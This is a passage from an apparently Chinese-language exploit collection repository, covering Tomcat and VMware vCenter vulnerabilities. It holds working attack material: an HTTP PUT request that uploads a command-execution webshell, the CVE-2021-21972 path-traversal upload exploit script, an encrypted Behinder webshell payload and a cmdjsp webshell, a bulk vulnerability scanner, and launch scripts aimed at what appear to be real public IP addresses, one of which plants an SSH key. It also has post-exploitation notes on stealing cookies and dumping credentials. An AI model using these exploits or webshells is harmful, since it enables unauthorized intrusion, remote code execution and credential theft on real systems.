攻击系统:Kali-Linux-2020.2-vmware-amd64 42 | 43 | 复现针对自己编写的websocket应用: 44 | 执行如下命令: 45 | git clone https://github.com/RedTeamPentesting/CVE-2020-13935 46 | cd CVE-2020-13935 47 | go build 48 | ./tcdos ws://172.16.35.133:8080/DemoTwo/endpoint 49 | 执行后靶机系统CPU骤升到100%,如下图 50 | ![image](./a2.png) 51 | 此时,tomcat管理控制台显示如下 52 | ![image](./a3.png) 53 | 54 | 复现针对自带的websocket应用: 55 | 首先访问[http://172.16.35.133:8080/examples/websocket/](http://172.16.35.133:8080/examples/websocket/)确认存在WebSocket应用,如下图 56 | ![image](./f.png) 57 | 执行如下命令: 58 | ./tcdos ws://172.16.35.133:8080/examples/websocket/echoProgrammatic 59 | 执行后靶机系统CPU骤升到100%,如下图 60 | ![image](./c.png) 61 | 62 | # 0x06 踩坑记录 63 | 坑1: 64 | 执行go build后,可能会报如下错误 65 | ![image](./d.png) 66 | 此时需要一些合理上网方式,成功执行后如下图 67 | ![image](./e.png) 68 | 69 | # 0x07 参考链接 70 | https://www.anquanke.com/post/id/221861 71 | https://github.com/RedTeamPentesting/CVE-2020-13935 72 | https://www.pegaxchange.com/2018/01/28/websocket-server-java/ 73 | https://www.pegaxchange.com/2016/09/02/java-eclipse-tomcat/ 74 | https://www.cnblogs.com/xdp-gacl/p/5193279.html 75 | https://blog.redteam-pentesting.de/2020/websocket-vulnerability-tomcat/ 76 | -------------------------------------------------------------------------------- /Tomcat/Tomcat WebSocket拒绝服务漏洞(CVE-2020-13935)/tcdos: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Tomcat/Tomcat WebSocket拒绝服务漏洞(CVE-2020-13935)/tcdos -------------------------------------------------------------------------------- /Tomcat/Tomcat任意文件写入漏洞(CVE-2017-12615)/f0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Tomcat/Tomcat任意文件写入漏洞(CVE-2017-12615)/f0.png -------------------------------------------------------------------------------- /Tomcat/Tomcat任意文件写入漏洞(CVE-2017-12615)/f1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Tomcat/Tomcat任意文件写入漏洞(CVE-2017-12615)/f1.png -------------------------------------------------------------------------------- /Tomcat/Tomcat任意文件写入漏洞(CVE-2017-12615)/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 复现环境 2 | 使用复现环境:https://www.mozhe.cn/bug/detail/120 3 | 复现版本:Tomcat 7.0.79 4 | 5 | # 0x01 环境搭建 6 | 无 7 | 8 | # 0x02 利用条件 9 | 安装在Windows下 10 | 11 | # 0x03 影响版本 12 | 7.0.0 <= Tomcat <= 7.0.79 13 | 14 | # 0x04 漏洞复现 15 | 攻击环境:kali2020 16 | 17 | 访问目标地址,burp抓包,改包如下: 18 | ``` 19 | PUT /cmd.jsp// HTTP/1.1 20 | PUT /cmd.jsp/ HTTP/1.1 21 | PUT /cmd.jsp HTTP/1.1 22 | Host: 219.153.49.228:45174 23 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 24 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 25 | Accept-Language: en-US,en;q=0.5 26 | Accept-Encoding: gzip, deflate 27 | Connection: close 28 | Upgrade-Insecure-Requests: 1 29 | Pragma: no-cache 30 | Cache-Control: no-cache 31 | Content-Length: 313 32 | 33 | <% 34 | java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream(); 35 | int a = -1; 36 | byte[] b = new byte[2048]; 37 | out.print("
");
38 |         while((a=in.read(b))!=-1){
39 |             out.println(new String(b));
40 |         }
41 |         out.print("
"); 42 | %> 43 | ``` 44 | Send后,返回如下,返回“HTTP/1.1 201 Created”表示文件创建成功 45 | ![image](./f0.png) 46 | 访问如下URL:http://219.153.49.228:45174/cmd.jsp?cmd=cat%20/key.txt 后,返回执行命令后的结果 47 | ![image](./f1.png) 48 | 49 | # 0x05 踩坑记录 50 | 无 51 | 52 | # 0x06 参考链接 53 | 无 54 | -------------------------------------------------------------------------------- /VMWare/VMWare vCenter Server后利用/readme.md: -------------------------------------------------------------------------------- 1 | ### 0x01-VMware vCenter查看版本 2 | ``` 3 | text 4 | POST /sdk HTTP/2 5 | Host: 172.18.2.62 6 | User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36 7 | Accept: */* 8 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 9 | Accept-Encoding: gzip, deflate 10 | Cache-Control: no-cache 11 | Pragma: no-cache 12 | Content-Type: application/x-www-form-urlencoded 13 | Content-Length: 335 14 | Te: trailers 15 | Connection: close 16 | 17 | 18 | 19 | 20 | <_this type="ServiceInstance">ServiceInstance 21 | 22 | 23 | 24 | ``` 25 | 26 | ### 0x02-VMware ESXi查看版本 27 | ``` 28 | text 29 | POST /sdk HTTP/1.1 30 | Host: 10.10.15.4 31 | User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36 32 | Accept: */* 33 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 34 | Accept-Encoding: gzip, deflate 35 | Cache-Control: no-cache 36 | Pragma: no-cache 37 | Content-Type: application/x-www-form-urlencoded 38 | Content-Length: 335 39 | Te: trailers 40 | Connection: close 41 | 42 | 43 | 44 | 45 | <_this type="ServiceInstance">ServiceInstance 46 | 47 | 48 | 49 | ``` 50 | 51 | ### 0x03-任意文件读取到登录后台 52 | ``` 53 | text 54 | Linux 55 | /storage/db/vmware-vmdir/data.mdb 56 | 57 | Windows 58 | C:\ProgramData\VMware\vCenterServer\data\vmdird\data.mdb 59 | 60 | 例子 61 | https://10.8.12.170/eam/vib?id=C:\ProgramData\VMware\vCenterServer\data\vmdird\data.mdb 62 | 63 | 通过vcenter_saml_login提取cookie 64 | 65 | 替换cookie登录后台 66 | ``` 67 | 68 | ### 0x04-漏洞利用到登录后台 69 | ``` 70 | text 71 | 漏洞利用拿到shell 72 | 73 | 通过vcenter_saml_login提取cookie 74 | 75 | 替换cookie登录后台 76 | ``` 77 | 78 | ### 0x05-登录后台到拿下虚拟机 79 | ``` 80 | text 81 | 可通过vcenter的快照功能获取虚拟机的快照,然后通过内存取证的姿势dump凭证,pth; 82 | 83 | 也可传到本地,再恢复成虚拟机,然后通过PE,重命名CMD.EXE为OSK.exe覆盖原OSK.exe,此时 84 | 开机打开屏幕键盘会弹出SYSTEM权限的命令行窗口,本地上线cs然后hashdump抓取凭证,pth即 85 | 可。(by banliz1) 86 | ``` 87 | 88 | ### 参考链接 89 | https://github.com/pen4uin/pentest-note/blob/main/README.md#内网-vsphere--vcenter的后利用姿势 90 | https://github.com/horizon3ai/vcenter_saml_login](https://github.com/horizon3ai/vcenter_saml_login -------------------------------------------------------------------------------- /VMWare/VMware vCenter Server未授权文件上传导致RCE漏洞(CVE-2021-21972)/Sp4ce/CVE-2021-21972/README.md: -------------------------------------------------------------------------------- 1 | # CVE-2021-21972 2 | CVE-2021-21972 3 | 4 | 5 | # Works On 6 | 7 | - VMware-VCSA-all-6.7.0-8217866、VMware-VIM-all-6.7.0-8217866 ✔ 8 | - VMware-VCSA-all-6.5.0-16613358 ✔ 9 | 10 | # For vCenter6.7 U2+ 11 | vCenter 6.7U2+ running website in memory,so this exp can't work for 6.7 u2+. 12 | 13 | # Need test 14 | 15 | - ~~vCenter 6.5 Linux(VCSA)/Window **Waiting For Test**~~ 16 | - ~~vCenter 6.7 Linux(VCSA)/Window **Waiting For Test**~~ 17 | - ~~vCenter 7.0 Linux(VCSA)/Window **Waiting For Test**~~ 18 | 19 | # Details 20 | 21 | 1. 漏洞为任意文件上传 22 | 2. 存在问题的接口为`/ui/vropspluginui/rest/services/uploadova`,完整路径(`https://domain.com/ui/vropspluginui/rest/services/uploadova`) 23 | 3. 仓库内的`payload`文件夹内的`tar`文件为默认冰蝎3 webshell 24 | 25 | # Screenshots 26 | 27 | ## Runtime 28 | 29 | ![3.png](/img/3.png) 30 | 31 | ## Success 32 | 33 | 34 | 35 | ![1.png](/img/1.png) 36 | 37 | ![1.png](/img/2.png) 38 | 39 | # 声明 40 | 41 | - 工具仅用于安全人员安全测试与研究使用,任何未授权检测造成的直接或者间接的后果及损失,均由使用者本人负责。 42 | - The tool is only used for security testing and research by security personnel. Any direct or indirect consequences and losses caused by unauthorized testing are the responsibility of the user. 43 | -------------------------------------------------------------------------------- /VMWare/VMware vCenter Server未授权文件上传导致RCE漏洞(CVE-2021-21972)/Sp4ce/CVE-2021-21972/img/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/VMWare/VMware vCenter Server未授权文件上传导致RCE漏洞(CVE-2021-21972)/Sp4ce/CVE-2021-21972/img/1.png -------------------------------------------------------------------------------- /VMWare/VMware vCenter Server未授权文件上传导致RCE漏洞(CVE-2021-21972)/Sp4ce/CVE-2021-21972/img/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/VMWare/VMware vCenter Server未授权文件上传导致RCE漏洞(CVE-2021-21972)/Sp4ce/CVE-2021-21972/img/2.png -------------------------------------------------------------------------------- /VMWare/VMware vCenter Server未授权文件上传导致RCE漏洞(CVE-2021-21972)/Sp4ce/CVE-2021-21972/img/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/VMWare/VMware vCenter Server未授权文件上传导致RCE漏洞(CVE-2021-21972)/Sp4ce/CVE-2021-21972/img/3.png -------------------------------------------------------------------------------- /VMWare/VMware vCenter Server未授权文件上传导致RCE漏洞(CVE-2021-21972)/Sp4ce/CVE-2021-21972/payload/Linux.tar: -------------------------------------------------------------------------------- 1 | ../../usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/41/0/h5ngc.war/resources/0040755000000000000000000000000014015431210027210 5ustar00rootroot../../usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/41/0/h5ngc.war/resources/shell.jsp0100644000000000000000000000117114015430711031037 0ustar00rootroot<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}/*1kdnwbry2LyI7pyA*/%> 2 | -------------------------------------------------------------------------------- /VMWare/VMware vCenter Server未授权文件上传导致RCE漏洞(CVE-2021-21972)/Sp4ce/CVE-2021-21972/payload/Linux/shell.jsp: -------------------------------------------------------------------------------- 1 | <%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}/*1kdnwbry2LyI7pyA*/%> 2 | -------------------------------------------------------------------------------- /VMWare/VMware vCenter Server未授权文件上传导致RCE漏洞(CVE-2021-21972)/Sp4ce/start.sh: -------------------------------------------------------------------------------- 1 | python3 ./CVE-2021-21972/CVE-2021-21972.py -url https://218.21.239.158:22222 -------------------------------------------------------------------------------- /VMWare/VMware vCenter Server未授权文件上传导致RCE漏洞(CVE-2021-21972)/horizon3ai/CVE-2021-21972/CVE-2021-21972-Unix-Proof.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/VMWare/VMware vCenter Server未授权文件上传导致RCE漏洞(CVE-2021-21972)/horizon3ai/CVE-2021-21972/CVE-2021-21972-Unix-Proof.png -------------------------------------------------------------------------------- /VMWare/VMware vCenter Server未授权文件上传导致RCE漏洞(CVE-2021-21972)/horizon3ai/CVE-2021-21972/CVE-2021-21972-Windows-Proof.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/VMWare/VMware vCenter Server未授权文件上传导致RCE漏洞(CVE-2021-21972)/horizon3ai/CVE-2021-21972/CVE-2021-21972-Windows-Proof.png -------------------------------------------------------------------------------- /VMWare/VMware vCenter Server未授权文件上传导致RCE漏洞(CVE-2021-21972)/horizon3ai/CVE-2021-21972/CVE-2021-21972.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | 3 | import argparse 4 | import requests 5 | import tarfile 6 | import urllib3 7 | 8 | #disable ssl warning 9 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 10 | 11 | ENDPOINT = '/ui/vropspluginui/rest/services/uploadova' 12 | 13 | def check(ip): 14 | r = requests.get('https://' + ip + ENDPOINT, verify=False, timeout=30) 15 | if r.status_code == 405: 16 | print('[+] ' + ip + ' vulnerable to CVE-2021-21972!') 17 | return True 18 | else: 19 | print('[-] ' + ip + ' not vulnerable to CVE-2021-21972. Response code: ' + str(r.status_code) + '.') 20 | return False 21 | 22 | def make_traversal_path(path, level=5, os="unix"): 23 | if os == "win": 24 | traversal = ".." + "\\" 25 | fullpath = traversal*level + path 26 | return fullpath.replace('/', '\\').replace('\\\\', '\\') 27 | else: 28 | traversal = ".." + "/" 29 | fullpath = traversal*level + path 30 | return fullpath.replace('\\', '/').replace('//', '/') 31 | 32 | def archive(file, path, os): 33 | tarf = tarfile.open('exploit.tar', 'w') 34 | fullpath = make_traversal_path(path, level=5, os=os) 35 | print('[+] Adding ' + file + ' as ' + fullpath + ' to archive') 36 | tarf.add(file, fullpath) 37 | tarf.close() 38 | print('[+] Wrote ' + file + ' to exploit.tar on local filesystem') 39 | 40 | def post(ip): 41 | r = requests.post('https://' + ip + ENDPOINT, files={'uploadFile':open('exploit.tar', 'rb')}, verify=False, timeout=30) 42 | if r.status_code == 200 and r.text == 'SUCCESS': 43 | print('[+] File uploaded successfully') 44 | else: 45 | print('[-] File failed to upload the archive. The service may not have permissions for the specified path') 46 | print('[-] Status Code: ' + str(r.status_code) + ', Response:\n' + r.text) 47 | 48 | if __name__ == "__main__": 49 | 50 | parser = argparse.ArgumentParser() 51 | parser.add_argument('-t', '--target', help='The IP address of the target', required=True) 52 | parser.add_argument('-f', '--file', help='The file to tar') 53 | parser.add_argument('-p', '--path', help='The path to extract the file to on target') 54 | parser.add_argument('-o', '--operating-system', help='The operating system of the VCSA server') 55 | args = parser.parse_args() 56 | 57 | vulnerable = check(args.target); 58 | 59 | if vulnerable and (args.file and args.path and args.operating_system): 60 | archive(args.file, args.path, args.operating_system) 61 | post(args.target) -------------------------------------------------------------------------------- /VMWare/VMware vCenter Server未授权文件上传导致RCE漏洞(CVE-2021-21972)/horizon3ai/CVE-2021-21972/README.md: -------------------------------------------------------------------------------- 1 | # CVE-2021-21972 2 | Proof of Concept Exploit for vCenter CVE-2021-21972 3 | 4 | Research credit to: https://swarm.ptsecurity.com/unauth-rce-vmware/, http://noahblog.360.cn/vcenter-6-5-7-0-rce-lou-dong-fen-xi/ 5 | 6 | Tested on both Windows and Unix vCenter VCSA targets. 7 | 8 | 9 | ## Usage 10 | To benignly check if the target is vulnerable just supply the --target argument. 11 | 12 | To exploit provide the --file, --path, and --operating-system flags. 13 | Write the file supplied in the --file argument to the location specified in the --path argument. 14 | 15 | ## Windows Targets: 16 | Tested by uploading the webshell cmdjsp.jsp to the /statsreport endpoint as indicated by PtSwarm. The webshell executes commands in the context of NT AUTHORITY/SYSTEM. 17 | 18 | ![WindowsExec](Windows-Exec.png) 19 | 20 | ![WindowsProof](CVE-2021-21972-Windows-Proof.png) 21 | 22 | ## Unix Targets: 23 | The file will be written in the context of the vsphere-ui user. 24 | If the target is vulnerable, but the exploit fails, it is likely that the vsphere-ui user does not have permissions to write to the specified path. 25 | 26 | If writing the vsphere-ui user's SSH authorized_keys, when SSH'ing with the keys it was observed in some cases that the vsphere-ui user's password had expired and forced you to update it (which you cannot because no password is set). 27 | 28 | ![UnixProof](CVE-2021-21972-Unix-Proof.png) 29 | -------------------------------------------------------------------------------- /VMWare/VMware vCenter Server未授权文件上传导致RCE漏洞(CVE-2021-21972)/horizon3ai/CVE-2021-21972/Windows-Exec.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/VMWare/VMware vCenter Server未授权文件上传导致RCE漏洞(CVE-2021-21972)/horizon3ai/CVE-2021-21972/Windows-Exec.png -------------------------------------------------------------------------------- /VMWare/VMware vCenter Server未授权文件上传导致RCE漏洞(CVE-2021-21972)/horizon3ai/CVE-2021-21972/cmdjsp.jsp: -------------------------------------------------------------------------------- 1 | // copied from https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/jsp/cmdjsp.jsp 2 | // note that linux = cmd and windows = "cmd.exe /c + cmd" 3 | 4 |
5 | 6 | 7 |
8 | 9 | <%@ page import="java.io.*" %> 10 | <% 11 | String cmd = request.getParameter("cmd"); 12 | String output = ""; 13 | if(cmd != null) { 14 | String s = null; 15 | try { 16 | Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd); 17 | BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream())); 18 | while((s = sI.readLine()) != null) { 19 | output += s; 20 | } 21 | } 22 | catch(IOException e) { 23 | e.printStackTrace(); 24 | } 25 | } 26 | %> 27 | 28 | 
29 | <%=output %>
30 |
31 | 32 | 33 | 34 | -------------------------------------------------------------------------------- /VMWare/VMware vCenter Server未授权文件上传导致RCE漏洞(CVE-2021-21972)/horizon3ai/start-for-unix.sh: -------------------------------------------------------------------------------- 1 | python3 ./CVE-2021-21972.py -t 171.88.68.51:9443 -f /home/kali/.ssh/id_rsa.pub -p /home/vsphere-ui/.ssh/authorized_keys -o unix -------------------------------------------------------------------------------- /VMWare/VMware vCenter Server未授权文件上传导致RCE漏洞(CVE-2021-21972)/pic/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/VMWare/VMware vCenter Server未授权文件上传导致RCE漏洞(CVE-2021-21972)/pic/0.png -------------------------------------------------------------------------------- /VMWare/VMware vCenter Server未授权文件上传导致RCE漏洞(CVE-2021-21972)/pic/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/VMWare/VMware vCenter Server未授权文件上传导致RCE漏洞(CVE-2021-21972)/pic/1.png -------------------------------------------------------------------------------- /VMWare/VMware vCenter Server未授权文件上传导致RCE漏洞(CVE-2021-21972)/pic/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/VMWare/VMware vCenter Server未授权文件上传导致RCE漏洞(CVE-2021-21972)/pic/2.png -------------------------------------------------------------------------------- /VMWare/VMware vCenter Server未授权文件上传导致RCE漏洞(CVE-2021-21972)/pic/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/VMWare/VMware vCenter Server未授权文件上传导致RCE漏洞(CVE-2021-21972)/pic/3.png -------------------------------------------------------------------------------- /VMWare/VMware vCenter Server未授权文件上传导致RCE漏洞(CVE-2021-21972)/pic/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/VMWare/VMware vCenter Server未授权文件上传导致RCE漏洞(CVE-2021-21972)/pic/4.png -------------------------------------------------------------------------------- /VMWare/VMware vCenter Server未授权文件上传导致RCE漏洞(CVE-2021-21972)/pic/readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /VMWare/VMware vCenter Server未授权文件上传导致RCE漏洞(CVE-2021-21972)/vCenter任意文件上传-batch-detect.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import argparse 3 | import urllib3 4 | 5 | #disable ssl warning 6 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 7 | 8 | #如果报错ssl.SSLError: [SSL: UNSUPPORTED_PROTOCOL] unsupported protocol (_ssl.c:852) 9 | #修改/etc/ssl/openssl.cnf,将TLSv1.2改为TLSv1.0 10 | #参考链接:https://stackoverflow.com/questions/59408646/ssl-sslerror-ssl-unsupported-protocol-unsupported-protocol-ssl-c852-in-d 11 | 12 | 13 | ENDPOINT = '/ui/vropspluginui/rest/services/uploadova' 14 | 15 | def banner(): 16 | print( 17 | """ 18 | _______ ________ ___ ___ ___ __ ___ __ ___ ______ ___ 19 | / ____\\ \\ / / ____| |__ \\ / _ \\__ \\/_ | |__ \\/_ |/ _ \\____ |__ \\ 20 | | | \\ \\ / /| |__ ______ ) | | | | ) || |______ ) || | (_) | / / ) | 21 | | | \\ \\/ / | __|______/ /| | | |/ / | |______/ / | |\\__, | / / / / 22 | | |____ \\ / | |____ / /_| |_| / /_ | | / /_ | | / / / / / /_ 23 | \\_____| \\/ |______| |____|\\___/____||_| |____||_| /_/ /_/ |____| 24 | Author: ybdt 25 | 26 | 27 | """ 28 | ); 29 | 30 | def check(ip): 31 | try: 32 | if "https://" in ip: 33 | r = requests.get(ip + ENDPOINT, verify=False, timeout=10); 34 | else: 35 | r = requests.get('https://' + ip + ENDPOINT, verify=False, timeout=10) 36 | except requests.exceptions.ConnectTimeout: 37 | print('[-] ' + ip + ' ConnectTimeout'); 38 | return False; 39 | except requests.exceptions.ReadTimeout: 40 | print('[-] ' + ip + ' ReadTimeout'); 41 | return False; 42 | except requests.exceptions.ConnectionError: 43 | print('[-] ' + ip + ' ConnectionError'); 44 | return False; 45 | 46 | if r.status_code == 405: 47 | print('[+] ' + ip + ' vulnerable to CVE-2021-21972!') 48 | return True 49 | else: 50 | print('[-] ' + ip + ' not vulnerable to CVE-2021-21972. Response code: ' + str(r.status_code) + '.') 51 | return False 52 | 53 | def main(): 54 | banner(); 55 | 56 | parser = argparse.ArgumentParser() 57 | parser.add_argument("-i", "--inputfile", help="The file contains ips, one per line", required=True); 58 | args = parser.parse_args() 59 | 60 | with open(args.inputfile, "r") as f_r: 61 | with open("vulnerable.txt", "w") as f_w: 62 | lines = f_r.readlines(); 63 | for line in lines: 64 | line = line.strip("\n").strip("\r\n"); 65 | vulnerable = check(line); 66 | if vulnerable: 67 | f_w.write(line + "\n"); 68 | 69 | main(); -------------------------------------------------------------------------------- /VMWare/VMware vCenter Server远程代码执行(CVE-2015-2342)【记录】/readme.md: -------------------------------------------------------------------------------- 1 | 1、尝试获取目标版本 2 | 2、通过版本比对表查看Build Number对应的版本:https://kb.vmware.com/s/article/2143832 3 | 3、得知目标版本是否在漏洞影响范围内 4 | 5 | ### CVE-2015-2342 6 | 漏洞参考链接:https://vulmon.com/vulnerabilitydetails?qid=CVE-2015-2342&scoretype=cvssv2 7 | ``` 8 | The JMX RMI service in VMware vCenter Server 9 | 5.0 before u3e 10 | 5.1 before u3b 11 | 5.5 before u3 12 | 6.0 before u1 13 | does not restrict registration of MBeans, which allows remote malicious users to execute arbitrary code via the RMI protocol. 14 | ``` 15 | 利用参考链接:https://github.com/mogwaisec/mjet 16 | -------------------------------------------------------------------------------- /VMWare/VMware vCenter Server远程代码执行(CVE-2015-2342)【记录】/版本比对表备份/Build numbers and versions of VMware ESXi_ESX (2143832)_files/KM_VMware_Logo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/VMWare/VMware vCenter Server远程代码执行(CVE-2015-2342)【记录】/版本比对表备份/Build numbers and versions of VMware ESXi_ESX (2143832)_files/KM_VMware_Logo -------------------------------------------------------------------------------- /VMWare/VMware vCenter Server远程代码执行(CVE-2015-2342)【记录】/版本比对表备份/Build numbers and versions of VMware ESXi_ESX (2143832)_files/OSU6T4K5BNEFDBKAQHSKNI: -------------------------------------------------------------------------------- 1 | __adroll.set_consent(true, false, false, "CN", "US", {"arconsent":null,"euconsent":null,"purposes":null,"eucookie":null,"banner":"custom_approved","max_vendor_id":1079,"networks":["a","g","f","aol","r","b","x","l","d","k","kx","freespee","bcd","o","c","u","n","index","pubmatic","taboola","outbrain","narrative","i","m","w","st","cy","sib","triplelift","linkedin","pixalate","oath","onevideo"]}); -------------------------------------------------------------------------------- /VMWare/VMware vCenter Server远程代码执行(CVE-2015-2342)【记录】/版本比对表备份/Build numbers and versions of VMware ESXi_ESX (2143832)_files/facebookv2.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /VMWare/VMware vCenter Server远程代码执行(CVE-2015-2342)【记录】/版本比对表备份/Build numbers and versions of VMware ESXi_ESX (2143832)_files/fonts.css: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/VMWare/VMware vCenter Server远程代码执行(CVE-2015-2342)【记录】/版本比对表备份/Build numbers and versions of VMware ESXi_ESX (2143832)_files/fonts.css -------------------------------------------------------------------------------- /VMWare/VMware vCenter Server远程代码执行(CVE-2015-2342)【记录】/版本比对表备份/Build numbers and versions of VMware ESXi_ESX (2143832)_files/fpconsent.js.下载: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/VMWare/VMware vCenter Server远程代码执行(CVE-2015-2342)【记录】/版本比对表备份/Build numbers and versions of VMware ESXi_ESX (2143832)_files/fpconsent.js.下载 -------------------------------------------------------------------------------- /VMWare/VMware vCenter Server远程代码执行(CVE-2015-2342)【记录】/版本比对表备份/Build numbers and versions of VMware ESXi_ESX (2143832)_files/index.js(1).下载: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/VMWare/VMware vCenter Server远程代码执行(CVE-2015-2342)【记录】/版本比对表备份/Build numbers and versions of VMware ESXi_ESX (2143832)_files/index.js(1).下载 -------------------------------------------------------------------------------- /VMWare/VMware vCenter Server远程代码执行(CVE-2015-2342)【记录】/版本比对表备份/Build numbers and versions of VMware ESXi_ESX (2143832)_files/index.js.下载: -------------------------------------------------------------------------------- 1 | window.adroll_exp_list = []; -------------------------------------------------------------------------------- /VMWare/VMware vCenter Server远程代码执行(CVE-2015-2342)【记录】/版本比对表备份/Build numbers and versions of VMware ESXi_ESX (2143832)_files/ip.js(1).下载: -------------------------------------------------------------------------------- 1 | var dbInfo={"registry_company_name":"China Networks Inter-Exchange","registry_city":"Beijing","registry_state":"BJ","registry_zip_code":null,"registry_area_code":null,"registry_dma_code":null,"registry_country":"China","registry_country_code":"CN","registry_latitude":39.93,"registry_longitude":116.39,"isp":true,"information_level":"Basic","audience":"Wireless","audience_segment":"Mobile Network","ip":"115.171.91.10","region_name":"Beijing","registry_country_code3":null} -------------------------------------------------------------------------------- /VMWare/VMware vCenter Server远程代码执行(CVE-2015-2342)【记录】/版本比对表备份/Build numbers and versions of VMware ESXi_ESX (2143832)_files/ip.js.下载: -------------------------------------------------------------------------------- 1 | var db={"registry_company_name":"China Networks Inter-Exchange","registry_city":"Beijing","registry_state":"BJ","registry_zip_code":null,"registry_area_code":null,"registry_dma_code":null,"registry_country":"China","registry_country_code":"CN","registry_latitude":39.93,"registry_longitude":116.39,"isp":true,"information_level":"Basic","audience":"Wireless","audience_segment":"Mobile Network","ip":"115.171.91.10","region_name":"Beijing","registry_country_code3":null} -------------------------------------------------------------------------------- /VMWare/VMware vCenter Server远程代码执行(CVE-2015-2342)【记录】/版本比对表备份/Build numbers and versions of VMware ESXi_ESX (2143832)_files/linkedInv2.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | -------------------------------------------------------------------------------- /VMWare/VMware vCenter Server远程代码执行(CVE-2015-2342)【记录】/版本比对表备份/Build numbers and versions of VMware ESXi_ESX (2143832)_files/location: -------------------------------------------------------------------------------- 1 | jsonFeed({"country":"HK","state":"","stateName":"","zipcode":"","timezone":"Asia/Hong_Kong","latitude":"22.25780","longitude":"114.16570","city":"","continent":"AS"}); -------------------------------------------------------------------------------- /VMWare/VMware vCenter Server远程代码执行(CVE-2015-2342)【记录】/版本比对表备份/Build numbers and versions of VMware ESXi_ESX (2143832)_files/munchkin.js(1).下载: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2007-2018, Marketo, Inc. All rights reserved. 3 | * See https://developers.marketo.com/MunchkinLicense.pdf for license terms 4 | * 